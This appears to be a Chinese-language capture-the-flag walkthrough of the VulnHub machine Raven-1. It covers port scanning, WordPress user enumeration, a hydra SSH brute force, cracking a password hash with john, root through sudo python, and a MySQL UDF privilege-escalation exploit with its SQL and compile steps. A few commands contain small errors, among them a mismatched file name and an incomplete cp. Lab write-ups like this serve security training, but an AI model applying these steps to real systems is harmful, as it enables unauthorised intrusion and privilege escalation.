靶机地址:Raven-1 ~ VulnHub
难易程度:2.0 / 10.0文章简要记录渗透靶机每一个过程,对于渗透过程中的每一步并非十分的详细,其中部分内容会有错,望读者指出错误,谢谢!
摘要:扫描后前往80端口信息搜索,对wordpress框架使用WPScan进行扫描,扫到两个用户,john破解出michael用户密码,获得低权限。登陆上后浏览wp-config.php文件信息,得到mysql的登陆密码,在wp_user的表内发现了steven的密码hash值,使用john进行破解,切换用户,sudo发现可以root权限执行python以获得root权限。hash值破解不出来的话,可以查看mysql的信息,为root启动的,且存在UDF漏洞,根据此漏洞也可以提权。
待完善地方:WPScan使用、john工具使用、UDP漏洞研究
主机探测&端口扫描
靶机ip为:192.168.1.13
端口扫描结果:
hhh@Kali2020:~$ sudo nmap -A -O -sS -p- -T5 192.168.1.13
Starting Nmap 7.80 ( https://nmap.org ) at 2021-02-04 11:13 CST
Nmap scan report for raven (192.168.1.13)
Host is up (0.00030s latency).
Not shown: 65531 closed ports
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 6.7p1 Debian 5+deb8u4 (protocol 2.0)
| ssh-hostkey:
| 1024 26:81:c1:f3:5e:01:ef:93:49:3d:91:1e:ae:8b:3c:fc (DSA)
| 2048 31:58:01:19:4d:a2:80:a6:b9:0d:40:98:1c:97:aa:53 (RSA)
| 256 1f:77:31:19:de:b0:e1:6d:ca:77:07:76:84:d3:a9:a0 (ECDSA)
|_ 256 0e:85:71:a8:a2:c3:08:69:9c:91:c0:3f:84:18:df:ae (ED25519)
80/tcp open http Apache httpd 2.4.10 ((Debian))
|_http-server-header: Apache/2.4.10 (Debian)
|_http-title: Raven Security
111/tcp open rpcbind 2-4 (RPC #100000)
| rpcinfo:
| program version port/proto service
| 100000 2,3,4 111/tcp rpcbind
| 100000 2,3,4 111/udp rpcbind
| 100000 3,4 111/tcp6 rpcbind
| 100000 3,4 111/udp6 rpcbind
| 100024 1 46902/tcp6 status
| 100024 1 48039/udp6 status
| 100024 1 53045/udp status
|_ 100024 1 57612/tcp status
57612/tcp open status 1 (RPC #100024)
MAC Address: 08:00:27:A4:67:7C (Oracle VirtualBox virtual NIC)
Device type: general purpose
Running: Linux 3.X|4.X
OS CPE: cpe:/o:linux:linux_kernel:3 cpe:/o:linux:linux_kernel:4
OS details: Linux 3.2 - 4.9
Network Distance: 1 hop
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
TRACEROUTE
HOP RTT ADDRESS
1 0.30 ms raven (192.168.1.13)
OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 14.53 seconds
信息搜集
- 扫描目录结构
dirb http://192.168.1.13
扫描结果:
GENERATED WORDS: 4612
---- Scanning URL: http://192.168.1.13/ ----
==> DIRECTORY: http://192.168.1.13/css/
==> DIRECTORY: http://192.168.1.13/fonts/
==> DIRECTORY: http://192.168.1.13/img/
+ http://192.168.1.13/index.html (CODE:200|SIZE:16819)
==> DIRECTORY: http://192.168.1.13/js/
==> DIRECTORY: http://192.168.1.13/manual/
+ http://192.168.1.13/server-status (CODE:403|SIZE:300)
==> DIRECTORY: http://192.168.1.13/vendor/
==> DIRECTORY: http://192.168.1.13/wordpress/
有个/wordpress目录,在对server页面源码中找到了flag1
- 通过WPScan工具对wordpress进行扫描,扫描出两个用户名
wpscan --url "http://192.168.1.13/wordpress" -eu
--url:指定url
-eu:e指的是枚举操作,u指的是用户,即枚举用户
扫描结果:
[i] User(s) Identified:
[+] steven
| Found By: Author Id Brute Forcing - Author Pattern (Aggressive Detection)
| Confirmed By: Login Error Messages (Aggressive Detection)
[+] michael
| Found By: Author Id Brute Forcing - Author Pattern (Aggressive Detection)
| Confirmed By: Login Error Messages (Aggressive Detection)
权限获取
- 使用hydra对破解两个用户的ssh密码,但只破解了一个michael用户的
hydra -L user.txt -P /usr/share/wordlists/rockyou.txt 192.168.1.13 ssh
NB. user.txt为两个用户名,rockyou.txt字典需提前解压再使用(NB.表示注意的意思)
扫描结果:
[22][ssh] host: 192.168.1.13 login: michael password: michael
成功登录
权限提升
线路一:切换用户
当前用户michael的sudo权限无
前往wordpress目录下搜索信息
- 在wp-config.php文件中发现mysql账号密码信息
/** MySQL database username */
define('DB_USER', 'root');
/** MySQL database password */
define('DB_PASSWORD', 'R@v3nSecurity');
- 登录数据库继续搜索信息
得到两个用户的密码哈希值
mysql -uroot -pR@v3nSecurity
mysql> show databases;
+--------------------+
| Database |
+--------------------+
| information_schema |
| mysql |
| performance_schema |
| wordpress |
+--------------------+
4 rows in set (0.00 sec)
mysql> use wordpress;
Reading table information for completion of table and column names
You can turn off this feature to get a quicker startup with -A
Database changed
mysql> show tables;
+-----------------------+
| Tables_in_wordpress |
+-----------------------+
| wp_commentmeta |
| wp_comments |
| wp_links |
| wp_options |
| wp_postmeta |
| wp_posts |
| wp_term_relationships |
| wp_term_taxonomy |
| wp_termmeta |
| wp_terms |
| wp_usermeta |
| wp_users |
+-----------------------+
12 rows in set (0.00 sec)
mysql> select * from wp_users;
+----+------------+------------------------------------+---------------+-------------------+----------+---------------------+---------------------+-------------+----------------+
| ID | user_login | user_pass | user_nicename | user_email | user_url | user_registered | user_activation_key | user_status | display_name |
+----+------------+------------------------------------+---------------+-------------------+----------+---------------------+---------------------+-------------+----------------+
| 1 | michael | $P$BjRvZQ.VQcGZlDeiKToCQd.cPw5XCe0 | michael | michael@raven.org | | 2018-08-12 22:49:12 | | 0 | michael |
| 2 | steven | $P$Bk3VD9jsxx/loJoqNsURgHiaB23j7W/ | steven | steven@raven.org | | 2018-08-12 23:31:16 | | 0 | Steven Seagull |
+----+------------+------------------------------------+---------------+-------------------+----------+---------------------+---------------------+-------------+----------------+
2 rows in set (0.00 sec)
- 将steven的hash值复制到文本里面,使用john进行破解
# 存入hash
hhh@Kali2020:~$ cat pass.txt
$P$Bk3VD9jsxx/loJoqNsURgHiaB23j7W/
# 破解hash值
hhh@Kali2020:~$ john pass.txt
# 查看破解的明文
hhh@Kali2020:~$ john --show pass.txt
?:pink84
也可以使用在线的md5破解网站,https://www.somd5.com/,输入 $P$Bk3VD9jsxx/loJoqNsURgHiaB23j7W/ 点击解密,等待片刻即可
- 登录进steven用户,发现sudo权限可以执行
/usr/bin/python我们就可以通过sudo python来得到root权限
$ sudo python -c 'import pty;pty.spawn("/bin/bash")'
root@Raven:/var/www/html/wordpress# id
uid=0(root) gid=0(root) groups=0(root)
root@Raven:/var/www/html/wordpress# cd /root/
root@Raven:~# ls
flag4.txt
root@Raven:~# cat flag4.txt
______
| ___
| |_/ /__ ___ _____ _ __
| // _` / / _ '_
| | (_| | V / __/ | | |
\_| \_\__,_| \_/ \___|_| |_|
flag4{715dea6c055b9fe3337544932f2941ce}
CONGRATULATIONS on successfully rooting Raven!
This is my first Boot2Root VM - I hope you enjoyed it.
Hit me up on Twitter and let me know what you thought:
@mccannwj / wjmccann.github.io
线路二:UDF漏洞提权
UDF全名为User Defined Function用户自定义函数,可以通过编写该函数实现我们需要的功能,简单来说,这里可以编写恶意脚本用于提权,漏洞信息网站MySQL 4.x/5.0 (Linux) - User-Defined Function (UDF) Dynamic Library (2) - Linux local Exploit
关于UDF漏洞的解析可以参考:
udf提权原理详解
MySQL-Exploit-Remote-Root-Code-Execution-Privesc-CVE-2016-6662
- 在kali上搜索并拷贝该脚本到当前路径
searchsploit 1518
cp /usr/share/exploitdb/exploits/linux/local/1518.c
- 编译该文件
gcc -g -c 1528.c
gcc -g -shared -Wl,-soname,1518.so -o 1518.so 1518.o -lc
- 登录进数据库,在MySQL中依次输入下面命令
use mysql; # 使用mysql数据库
create table foo(line blob); # 创建新的表foo
insert into foo values(load_file('/tmp/1518.so')); # 向表内导入1518.so的二进制数据
select * from foo into dumpfile '/usr/lib/mysql/plugin/1518.so'; # 将foo内容写入指定路径
create function do_system returns integer soname '1518.so'; # 创建udf函数
select * from mysql.func; # 查看udf函数
select do_system('chmod u+s /usr/bin/find'); # 执行udf函数,给find命令加权
exit # 退出
路径
/usr/lib/mysql/plugin/1518.so需要注意下
- 再执行下面指令,通过sudo的权限执行find命令并间接开启一个新的shell,即可得到root权限
find / -exec "/bin/sh" ;
-exec 表示执行了后面的命令xijie后就退出了当前的shell
更多细节信息参考:
总结
- WPScan
- hydra
- john破解MySQL数据库的密码hash值
- sudo python权限的间接提升
- UDF漏洞